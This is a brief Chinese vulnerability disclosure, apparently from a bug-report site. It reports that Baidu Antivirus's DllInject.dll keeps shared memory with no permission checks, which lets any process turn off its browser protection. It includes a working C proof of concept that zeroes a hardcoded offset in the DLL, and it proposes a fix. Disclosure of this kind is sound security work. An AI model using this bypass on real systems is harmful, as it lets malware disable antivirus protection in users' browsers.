DllInject.dll使用共享内存数据,且无权限检查,任意进程均可对其进行修改,造成百度杀毒对浏览器的防御失效。
以chrome浏览器为例:
攻击前:
攻击后:
可以看到,攻击后,chrome不再加载百度杀毒WebSafe、WebMonHook等几个功能DLL
LPCTSTR lpszDll = _T(“C:\\Program Files\\Baidu\\BaiduSd\\2.1.0.3086\\websafe\\DllInject.dll”); HMODULE hMod = LoadLibrary(lpszDll); DWORD* shareAddr = (DWORD*)((DWORD)hMod + 0x6000); // 针对2.1.0.3086的DllInject.dll *shareAddr = 0;修复方案:
使用更为安全的内存共享手段,增加权限控制。
